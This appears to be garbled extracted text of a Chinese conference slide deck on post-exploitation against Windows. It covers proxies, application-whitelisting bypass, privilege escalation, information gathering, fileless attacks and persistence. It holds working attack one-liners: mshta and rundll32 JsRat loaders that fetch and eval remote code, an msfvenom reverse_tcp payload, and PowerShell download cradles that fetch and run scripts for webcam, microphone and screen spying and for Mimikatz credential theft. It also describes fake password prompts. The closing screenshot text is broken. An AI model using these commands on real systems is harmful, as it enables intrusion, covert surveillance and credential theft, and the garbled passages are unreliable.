后渗透阶段的网络攻防对抗

1、Shell is Only the Beginning后渗透阶段的网络攻防对抗As a offensive researcher, if you can dream it,someone has likely already done it and that someone isnt the kind of person who speaks at security consMatt Graeber3gstudentGood StudyGood HealthGood Attitude后渗透阶段渗透测试以特定的业务系统作为目标，识 别出关键的基础设施，并寻找客 户组织最具价值和尝试进行安全 保护

2、的信息和资产黑客攻击黑客对攻击战果进一步扩大，以 及尽可能隐藏自身痕迹的过程打开一扇窗绕过看门狗我来作主人屋里有什么挖一个密道我来抓住你Open ProxyBypass ApplicationWhitelistingEscalate PrivilegesGather InformationPersistenceDetection and Mitigations目录打开一扇窗Open Proxy为什么用代理?更好地接触到目标所处环境使用已有shell的机器作为跳板，扩大战果Its the beginning常用方法HTTP- Tunnel;Metasploit- Portpwd HTTP- Re

3、Georg; Metasploit- Socks4a端口转发：Client- Lcx, Netsh;Socks代理：Client- Ew,Xsocks; 其他：SSH, ICMP 等Vpn！然而，我们可能会碰到这样的情况：安装杀毒软件,拦截“恶意”程序设置应用程序白名单,限制白名单以外的程序运行 eg：Windows ApplockerWindows AppLocker简介：即“应用程序控制策略”，可用来对可执行程序、安装程序和脚本进行控制 开启默认规则后，除了默认路径可以执行外，其他路径均无法执行程序和脚本绕过看门狗Bypass Application Whitelisting绕过思路Hta

4、Office MacroCplChmPowershellRundll32 Regsvr32 RegsvcsInstallutil1、HtaMore：Mshta.exe vbscript:CreateObject(Wscript.Shell).Run(calc.exe,0,true)(window.cl ose)Mshta.exe javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WScript.Shell).run(calc.exe ,0,true);tryh.Send();b=h.Res

5、ponseText;eval(b);catch(e)new%20ActiveX Object(WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);2、Office MacroMacroRaptor：Detect malicious VBA MacrosPython/decalage/oletools/wiki/mraptor3、CplDLL/CPL:生成Payload.dll:msfvenom -p windows/meterpreter/reverse_tcp -b x00 xff lhost=32 lport=8888 -

6、f dll -o payload.dll直接运行dll：rundll32 shell32.dll,Control_RunDLL payload.dll将dll重命名为cpl，双击运行普通的dll直接改后缀名From: /tips/160424、Chm高级组合技打造“完美” 捆绑后门：/tips/14254利用系统CHM文件实现隐蔽后门：那些年我们玩过的奇技淫巧5、PowershellCommand:powershell -nop -exec bypass -c IEX (New-Objectet.WebClient).DownloadString(http:/ip:port/)Get-Cont

7、ent payload.ps1 | iexcmd.exe /K key.snk$key =BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVA gSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7

8、dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitoluf o7Ucjh+WvZAU/dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU 0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89

9、tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHc gJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3r pZ9tbLZUefrFnLNiHfVjNi53Yg4=$Content = System.Convert:FromBase64String($key) Set-Co

10、ntent key.snk -Value $Content -Encoding Byte 编译：C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs运行：C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe Regasm.dll ORC:WindowsMicrosoft.NETFrameworkv4.0.30319re

11、gasm.exe Regasm.dll/如果没有管理员权限使用/U来运行C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U Regasm.dll C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Regasm.dllFrom: /subTee/e1c54e1fdafc15674c9a9、InstallutilInstallUtil：编译：C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /unsafe/platform:x6

12、4 /out:InstallUtil.exe InstallUtil.cs编译以后用/U参数运行：C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /U InstallUtil.exeFrom:http:/subt0 x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html/tips/886210、可执行目录通过ps脚本扫描可写入的路径,脚本下载地址：http:/go.mssec.se/AppLockerBCFrom: /tips/1180411、最直

13、接的方式提权我来作主人Escalate Privileges常见的提权方式本地提权漏洞服务提权协议Phishing本地提权根据补丁号来确定是否存在漏洞的脚本：/GDSSecurity/Windows-Exploit-Suggester将受害者计算机systeminfo导出到文件:Systeminfo 1.txt使用脚本判断存在的漏洞：python windows-exploit-suggester.py -database 2016-05-31-mssb.xls - systeminfo /Desktop/1.txt可能遇到的问题Exp被杀！将Exp改成Powershell：http:/evi

14、1cg.me/archives/MS16-032-Windows-Privilege-Escalation.htmlDemo Time服务提权常 用 服 务 ： Mssql，Mysql，Oracle，Ftp 第 三 方 服 务 ： Dll劫持，文件劫持提权脚本Powerup：/tips/11989协议提权利用已知的Windows中的问题，以获得本地权限提升 - Potato其利用NTLM中继（特别是基于HTTP SMB中继）和NBNS欺骗进行提权。 详情：http:/tools.pwn.ren/2016/01/17/potato-windows.htmlPhishingMSF Ask模块：ex

15、ploit/windows/local/ask通过runas方式来诱导用户通过点击uac验证来获取最高权限。 需要修改的msf脚本 metasploit/lib/msf/core/post/windows/runas.rbPhishing Demo3. sudo msfconsole sudo)u, )召巴 W1ndows7心中1屋里有什么Gather InformationGather Information成为了主人，或许我们需要看看屋里里面有什么？ 两 种 情 况 ： 1：已经提权有了最高权限，为所欲为2：未提权，用户还有UAC保护，还不能做所有的事情Bypass UAC常用方法：使用I

16、FileOperation COM接口使用Wusa.exe的extract选项 远程注入SHELLCODE 到傀儡进程 DLL劫持，劫持系统的DLL文件直接提权过UACPhishinghttp:/evi1cg.me/archives/Powershell_Bypass_UAC.html/?page_id=380有了权限，要做什么搜集mstsc记录，浏览器历史记录，最近操作的文件，本机密码等 键盘记录屏幕录像 NetripperGetPass Tips通过脚本弹出认证窗口，让用户输入账号密码，由此得到用户的明文密 码。powershell脚本如下：From:/Ridter/Pentest/blo

17、b/master/note/Powershell_MSFCapture.mdGetPass TipsMSF模块 post/windows/gather/phish_windows_credentials更多参考Installed ProgramsStartup ItemsInstalled ServicesSecurity ServicesFile/Printer Shares DatabaseServersCertificate AuthoritySensitive DataKey-loggingScreen captureNetwork traffic captureUser Inform

18、ation System ConfigurationPassword PolicySecurity PoliciesConfigured Wireless Networks and Keys新的攻击方法无文件无文件姿势之(一)-Powershell屏幕监控：powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(http:/evi1cg.me/powershell/Show-TargetScreen.ps1); Show-TargetScreen”录音：powershell -nop -exe

19、c bypass -c “IEX (New-Object Net.WebClient).DownloadString(/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1);Get- MicrophoneAudio -Path $env:TEMPsecret.wav -Length 10 -Alias SECRET”摄像头监控：powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(/xorrior/Rand

20、omPS-Scripts/master/MiniEye.ps1); Capture-MiniEye -RecordTime 2 - Path $env:temphack.avi”-Path $env:temphack.avi”抓Hash:powershell IEX (New-Object Net.WebClient).DownloadString(/samratashok/nishang/master/Gather/Get-PassHashes.ps1);Get-PassHashes抓明文：powershell IEX (New-Object Net.WebClient).DownloadS

21、tring(/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz无文件姿势之(一)-PowershellEmpire:Metasploit:无文件姿势之(二)- jsJsRat：rundll32.exe javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WinHttp.WinHttpRequest. 5.1);h.Open(GET,:8081/connect,false);

22、tryh.S end();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(WSc ript.Shell).Run(cmd /c taskkill /f /im rundll32.exe,0,true);From:JavaScript Backdoor /tips/11764JavaScript Phishing/tips/12386无文件姿势之(三)- mshta启动JsRat：Mshta javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObj

23、ect(WinHttp.WinHttpRequest.5.1);h.Open(GET,01:9998/connect,false);tryh.Send();b=h.Res ponseText;eval(b);catch(e)new%20ActiveXObject( WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);无文件姿势之(四)- sctSCT：regsvr32 /u /s/i:http:/urlto/calc.sctscrobj.dllCalc.sctFrom: Use SCT to

24、Bypass Application Whitelisting Protection /tips/15124无文件姿势之(五) - wscWsc：rundll32.exe javascript:.mshtml,RunHTMLApplic ation ;document.write();GetObject(script:http:/urlto/calc.wsc)Calc.wscFrom: WSC、JSRAT and WMI Backdoor /tips/15575Demo Timeregsv32 /u /s /L00/calc.sct sc-叫）一，b鲁.98挖一个密道Persistence常见

25、方法启动项注册表 wmiatschtasks利用已有的第三方服务新方法Bitsadmin：需要获得管理员权限可开机自启动、间隔启动适用于Win7 、Win8、Server 2008及以上操作系统可绕过Autoruns对启动项的检测已提交至MSRC(Microsoft Security Response Center)Demo Time汕且， 仁 ，En1t ryOp t i o 飞Autoruns - Sysinternals: www.sysin t e r na ls .c o m1-1e l p谴 岭 谧X霄Filter: 团Coale 竺三sI il1 LSi P rov 啦 rn已

26、Boo t E:x 眨 l.llt e巴I mage Hija也困 Appl mi t七 Me 切 ork Prnviders芯: 厂 l 气i ：da: :飞o o 二r 芍 E v e y th in g迅 Logo rn芯 Explor erI rnt e m e t E x p lo r e r往 s中 e clu le cl T a志喝 Ser vices乌j Dr iv e r s 归 oru n Entr.,Descri团ionPuhilisheImage Path窗 H KLMS ystemCurrentCont心Set S ervic esc : windo ws甲Time式

27、可 2016/ 3心.em妇rive 2013/ 4/ LSI 如 are SCSI Sto 巾 ort Ori LSIPMC-Sierra Sto 巾ort Driv可 . PMC-SierraA H O I 1 . 3 D e v i c e D e闷归n e e d M i c ro D e v i c es AM D T e c hn o lo 守层Storage Rite DriveI Co. AMO Tec hn olog ies In c .闷 vanc eal M icro D e v ic e s巳 凶 妞areA D POO欢回囚 己 m cds at 己 巳amclsbs

28、 巳 圉 am 妇 a 巴囚 已res 已S知pt e c S 压RA I D f S 伲 . PMC-Sierra. Inc .c : windo wss, 呾em妇rive. 勾 13/7 / c : w i n do w心 哼 tem32drive . 20 1 3 /7 凡 c : windo ws亟em码rive 2012/ 12 c : w in do wss, 呾em妇rive. 勾 13/7 / ! c : windo w心 ysl:em 32drive. 2013/7处BOM Fun中 on 2 Device Ori. 1/lfincilow s (R) Vin 7 DD K

29、 p. c : window森 炟 em立 如 e 勾 13/ 8-/巳 卤 bcmfn2巳 圉 e 1i 如 .ress回 凶 G PIOlnt el( R) Gig已b it 压 a团 e r N D I . . Int e l C o rp o rat ion lnt el(R) 闷 om汀M) Proc.e sso . Int e l Corpo rat ion硝 H KLMS oft ware Micros吮 V.in do w s N TCurrentVersion Drive志 2c : w in do wss, 壶 m妇rive. 2013/ 3.名 c : w in do w

30、ss, 如 m32drive. 2013-/ 6. 名2016/ 3心.巳 口 msacm J华 c mM PEG 匼如-3 Audio Code .回vid c .c vidO n ep已K织 扁紨码器F 厄 urlh m 旬Radius Inc .n stitut lntegriert. _. c : w in do wsw., 如 m32J3c o. _ _ 20 1 3 / & 名c : window心 如 m立 如 cvi. 2013-/ a,丘硝 H KL MS O 百 W AREO asses HtmlfileS hell OpenCo mmand( Default)巳 急 C: Program Fil. Int em et 巳平lo 面M ic ros忒t CC!I巾 C!Jrat i C!Jnc : p m g ra m fi l e s j nt e m et 这嘟 H KLMS ystemCurrentContro1S et S ervic es l/lfin Sock 2 Parameters Protoc ol_Catalog叹 画 alog _Entri